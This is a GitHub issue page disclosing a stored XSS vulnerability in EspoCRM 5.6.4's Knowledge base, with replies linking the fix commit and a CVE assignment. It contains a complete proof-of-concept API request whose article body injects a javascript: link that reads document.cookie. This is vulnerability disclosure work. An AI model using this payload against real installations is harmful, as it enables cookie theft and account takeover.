Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Stored XSS in Knowledge base #1356

Closed
KhajiitStoleNothing opened this issue Jul 18, 2019 · 2 comments
Closed

Stored XSS in Knowledge base #1356

KhajiitStoleNothing opened this issue Jul 18, 2019 · 2 comments

Comments

@KhajiitStoleNothing
Copy link

Description

Current version of EspoCRM 5.6.4 is vulnerable to stored XSS due to lack of filtration of user-supplied data in Knowledge base. Malicious attacker can inject JavaScript code in the "body" parameter during knowledge base record creation. PoC contains a link, which will execute javascript code after being clicked.

PoC

Make the following request (insert your authentication data and hostname)

POST /api/v1/KnowledgeBaseArticle HTTP/1.1
Host: <HOSTNAME>
User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: Basic <AUTH TOKEN>
Espo-Authorization: <AUTH TOKEN>
Espo-Authorization-By-Token: true
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: <COOKIE>
Content-Length: 285

{"status":"Draft","language":"","assignedUserId":"5d2309cc55c04135e","assignedUserName":"user1 user1","name":"test","body":"<p><a href=\"javascript:alert(document.cookie)\">1234</a><br></p>","portalsIds":[],"portalsNames":{},"attachmentsIds":[],"categoriesIds":[],"categoriesNames":{}}

image

@yurikuzn
Copy link
Contributor

Fix: 6dd0bd8

@fgeek
Copy link

fgeek commented Aug 7, 2019

https://nvd.nist.gov/vuln/detail/CVE-2019-14350 has been assigned for this vulnerability.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants